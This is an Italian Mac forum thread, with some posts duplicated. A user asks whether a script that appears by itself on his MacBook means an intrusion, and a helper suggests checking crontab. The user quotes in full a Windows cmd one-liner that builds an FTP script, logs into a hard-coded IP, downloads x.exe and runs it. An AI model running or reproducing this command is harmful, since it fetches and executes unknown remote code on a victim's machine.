Intrusione ?
Intrusione ?
Ciao a tutti,
è il mio primo msg, quindi chiedo venia se sbaglio qualcosa.
Ho un Macbook Pro in cui gira Tiger, da qualche giorno, io lo vedo alla sera quando ci smanetto, ad un certo punto da solo parte questo script:
cmd /c echo open 65.113.3.92 21 >> ik &echo user st_joe bw >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &x.exe &exit
cmd /c close
Se sto cliccando su una cartella, mi rinomina la cartello con il testo dello script, se sono in rete e sto ad esempio chattando, mi scrive lo script nel campo del testo.
Secondo voi è un'intrusione?
Ciao e grazie
Esteban
è il mio primo msg, quindi chiedo venia se sbaglio qualcosa.
Ho un Macbook Pro in cui gira Tiger, da qualche giorno, io lo vedo alla sera quando ci smanetto, ad un certo punto da solo parte questo script:
cmd /c echo open 65.113.3.92 21 >> ik &echo user st_joe bw >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &x.exe &exit
cmd /c close
Se sto cliccando su una cartella, mi rinomina la cartello con il testo dello script, se sono in rete e sto ad esempio chattando, mi scrive lo script nel campo del testo.
Secondo voi è un'intrusione?
Ciao e grazie
Esteban
Forse dovresti spiegare meglio. Effettivamente e' uno script che lancia un ftp e preleva un file eseguibile per windows.
Cosa fai quando parte ? Riesci a ricordare da quanto tempo fa questo e se puo' essere legato a qualche installazione o operazione particolare che hai fatto ?
Per verificare comunque perche' parte: apri il terminale e digita:
sudo crontab -l (inserisci la password)
e poi posta qui il risultato.
Cosa fai quando parte ? Riesci a ricordare da quanto tempo fa questo e se puo' essere legato a qualche installazione o operazione particolare che hai fatto ?
Per verificare comunque perche' parte: apri il terminale e digita:
sudo crontab -l (inserisci la password)
e poi posta qui il risultato.
Chi non accetta critiche o discussioni e fa tutto per evitarle è un cialtrone, digli di smettere !!!
Quando parte lo script mi parte la sudorazione 
, non faccio nulla, scrive il testo dove capita e si ferma.
Forse è iniziato dopo che ho aggiornato il programma per il TomTom.
Comunque seguo le tue indicazione e riporto il risultato.
Scusa la domanda da profano:
la password è quella utente? Nel caso io non abbia creato nessun utente lascio in bianco?
Grazie mille
Stefano
, non faccio nulla, scrive il testo dove capita e si ferma.Forse è iniziato dopo che ho aggiornato il programma per il TomTom.
Comunque seguo le tue indicazione e riporto il risultato.
Scusa la domanda da profano:
la password è quella utente? Nel caso io non abbia creato nessun utente lascio in bianco?
Grazie mille
Stefano
-
Votantonio
- Oracolo di Mac Peer
- Posts: 4094
- Joined: Tue May 13, 2008 3:30 am
-
Votantonio
- Oracolo di Mac Peer
- Posts: 4094
- Joined: Tue May 13, 2008 3:30 am